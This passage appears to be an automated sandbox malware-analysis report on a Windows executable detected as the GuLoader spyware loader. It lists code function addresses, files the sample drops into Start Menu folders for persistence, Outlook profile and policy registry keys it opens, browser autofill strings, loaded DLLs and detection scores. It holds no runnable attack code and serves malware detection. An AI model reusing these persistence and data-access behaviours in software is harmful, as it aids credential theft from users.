            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B33012_2_37F6B330
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6323812_2_37F63238
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6DE3812_2_37F6DE38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F69B3812_2_37F69B38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F62012_2_37F6F620
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6702F12_2_37F6702F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6522812_2_37F65228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6882812_2_37F68828
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6322812_2_37F63228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6DE2912_2_37F6DE29
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6171012_2_37F61710
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A01012_2_37F6A010
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B31F12_2_37F6B31F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6291812_2_37F62918
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CB1812_2_37F6CB18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6521812_2_37F65218
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6881812_2_37F68818
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6000612_2_37F60006
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CB0712_2_37F6CB07
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E30012_2_37F6E300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A00112_2_37F6A001
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6290E12_2_37F6290E
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F60F12_2_37F6F60F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6170A12_2_37F6170A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6490812_2_37F64908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F182812_2_3A3F1828
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FF66812_2_3A3FF668
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F0E9812_2_3A3F0E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F7FA812_2_3A3F7FA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FF98812_2_3A3FF988
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDA3812_2_3A3FDA38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FF02812_2_3A3FF028
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F8C2812_2_3A3F8C28
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FBE2812_2_3A3FBE28
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F181812_2_3A3F1818
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FD40812_2_3A3FD408
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA20812_2_3A3FA208
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F000612_2_3A3F0006
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FC46812_2_3A3FC468
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F926812_2_3A3F9268
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA84812_2_3A3FA848
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDA4812_2_3A3FDA48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F004012_2_3A3F0040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F82B712_2_3A3F82B7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FFCA812_2_3A3FFCA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FCAA812_2_3A3FCAA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F98A812_2_3A3F98A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FFC9912_2_3A3FFC99
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE08812_2_3A3FE088
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FAE8812_2_3A3FAE88
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F0E8712_2_3A3F0E87
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F04F912_2_3A3F04F9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F9EE812_2_3A3F9EE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FD0E812_2_3A3FD0E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F9EDA12_2_3A3F9EDA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FB4C812_2_3A3FB4C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F82C812_2_3A3F82C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE6C812_2_3A3FE6C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FC13812_2_3A3FC138
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FD72812_2_3A3FD728
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA52812_2_3A3FA528
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA51712_2_3A3FA517
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FED0812_2_3A3FED08
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F050812_2_3A3F0508
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F890812_2_3A3F8908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FBB0812_2_3A3FBB08
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F1F6812_2_3A3F1F68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FAB6812_2_3A3FAB68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDD6812_2_3A3FDD68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F136012_2_3A3F1360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDD5712_2_3A3FDD57
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F135012_2_3A3F1350
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FC14812_2_3A3FC148
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F8F4812_2_3A3F8F48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FF34812_2_3A3FF348
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE3A812_2_3A3FE3A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FB1A812_2_3A3FB1A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE39A12_2_3A3FE39A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F7F9812_2_3A3F7F98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FC78812_2_3A3FC788
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F958812_2_3A3F9588
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FD3F812_2_3A3FD3F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F21F112_2_3A3F21F1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FB7E812_2_3A3FB7E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F85E812_2_3A3F85E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE9E812_2_3A3FE9E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE9D912_2_3A3FE9D9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F85D812_2_3A3F85D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FB7D812_2_3A3FB7D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F09D012_2_3A3F09D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F9BC812_2_3A3F9BC8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FCDC812_2_3A3FCDC8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F09C212_2_3A3F09C2
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40D3F012_2_3A40D3F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A406DA012_2_3A406DA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40644012_2_3A406440
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40324012_2_3A403240
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40004012_2_3A400040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A401C5012_2_3A401C50
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A404E5112_2_3A404E51
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A404E6012_2_3A404E60
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A401C6012_2_3A401C60
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40067012_2_3A400670
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40387112_2_3A403871
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A406A7112_2_3A406A71
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A405E0012_2_3A405E00
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A402C0012_2_3A402C00
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40160F12_2_3A40160F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40482012_2_3A404820
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40162012_2_3A401620
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40323012_2_3A403230
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A403EC012_2_3A403EC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A400CC012_2_3A400CC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4028CF12_2_3A4028CF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A405AD012_2_3A405AD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A405AE012_2_3A405AE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4028E012_2_3A4028E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4044EF12_2_3A4044EF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4012F012_2_3A4012F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A406A8012_2_3A406A80
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40388012_2_3A403880
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40068012_2_3A400680
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4054A012_2_3A4054A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4022A012_2_3A4022A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A404B4012_2_3A404B40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40194012_2_3A401940
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40355012_2_3A403550
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40356012_2_3A403560
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40036012_2_3A400360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40676012_2_3A406760
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40877812_2_3A408778
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40450012_2_3A404500
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40130012_2_3A401300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40EB1812_2_3A40EB18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40612012_2_3A406120
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A402F2012_2_3A402F20
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40192F12_2_3A40192F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A404B3112_2_3A404B31
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4057C012_2_3A4057C0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4025C012_2_3A4025C0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4041E012_2_3A4041E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A400FE012_2_3A400FE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A402BEF12_2_3A402BEF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A405DF112_2_3A405DF1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40518012_2_3A405180
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A401F8012_2_3A401F80
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A403B8F12_2_3A403B8F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A40099012_2_3A400990
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A406D9212_2_3A406D92
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A403BA012_2_3A403BA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4009A012_2_3A4009A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A4057B012_2_3A4057B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE37F012_2_3AAE37F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE48DA12_2_3AAE48DA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE2A2012_2_3AAE2A20
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE233812_2_3AAE2338
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE153012_2_3AAE1530
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE310812_2_3AAE3108
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE0E4812_2_3AAE0E48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE1C5012_2_3AAE1C50
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE098A12_2_3AAE098A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE37E612_2_3AAE37E6
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE0AD012_2_3AAE0AD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE152C12_2_3AAE152C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE232812_2_3AAE2328
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE0E3812_2_3AAE0E38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE000612_2_3AAE0006
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE310212_2_3AAE3102
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE0A1812_2_3AAE0A18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE2A1012_2_3AAE2A10
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE004012_2_3AAE0040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3AAE1C4012_2_3AAE1C40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: String function: 00402A07 appears 51 times
            Source: axN56TZ3PI.exeStatic PE information: invalid certificate
            Source: axN56TZ3PI.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: axN56TZ3PI.exe, 0000000C.00000002.6021727103.0000000070B7B000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs axN56TZ3PI.exe
            Source: axN56TZ3PI.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_004042E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042E6
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Wull157Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeMutant created: NULL
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Local\Temp\nst8CF5.tmpJump to behavior
            Source: axN56TZ3PI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: axN56TZ3PI.exeVirustotal: Detection: 65%
            Source: axN56TZ3PI.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile read: C:\Users\user\Desktop\axN56TZ3PI.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeProcess created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: fedtlderstvles.lnk.0.drLNK file: ..\foretell\Skrabnsens.bed
            Source: fedtlderstvles.lnk0.0.drLNK file: ..\..\user\foretell\Skrabnsens.bed
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\banaleres.iniJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.2039834509.00000000053C9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EC3
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_10002CE0 push eax; ret 0_2_10002D0E
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F62908 pushfd ; iretd 12_2_37F6290D
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F7800 push eax; ret 12_2_3A3F7809
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Local\Temp\nsp8FE4.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Wull157Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\juttingJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\TransmakingJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\samfundets.AfgJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Brugtbaaden.mirJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Draabning.NonJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\jutting\Transmaking\Dataopsamler.txtJump to behavior
